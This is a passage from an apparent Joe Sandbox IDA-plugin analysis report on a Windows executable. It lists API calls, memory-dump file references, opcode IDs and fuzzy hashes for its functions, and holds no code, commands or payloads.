                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 3850602802-3636473452
                                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                        • String ID:
                                                                                        • API String ID: 3985565216-0
                                                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                        • _free.LIBCMT ref: 0041F71A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                        • String ID: [B
                                                                                        • API String ID: 1020059152-632041663
                                                                                        • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                        • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                        APIs
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                        • _free.LIBCMT ref: 00413E07
                                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 155776804-0
                                                                                        • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                        • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                        APIs
                                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                        APIs
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                        • String ID:
                                                                                        • API String ID: 259663610-0
                                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3220332590-0
                                                                                        • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                        • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                        • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                        • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1612042205-0
                                                                                        • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                        • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                        • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                        • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strncmp
                                                                                        • String ID: >$U$\
                                                                                        • API String ID: 2666721431-237099441
                                                                                        • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                        • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                        • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                        • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                                        • String ID:
                                                                                        • API String ID: 2221674350-0
                                                                                        • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                        • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                        • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                        • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 2037614760-0
                                                                                        • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                        • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                        • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                        • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                        • String ID:
                                                                                        • API String ID: 960795272-0
                                                                                        • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                        • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                        • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                        • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                        APIs
                                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4189319755-0
                                                                                        • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                        • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                        • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                        • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 1976402638-0
                                                                                        • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                        • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                        • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                        • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
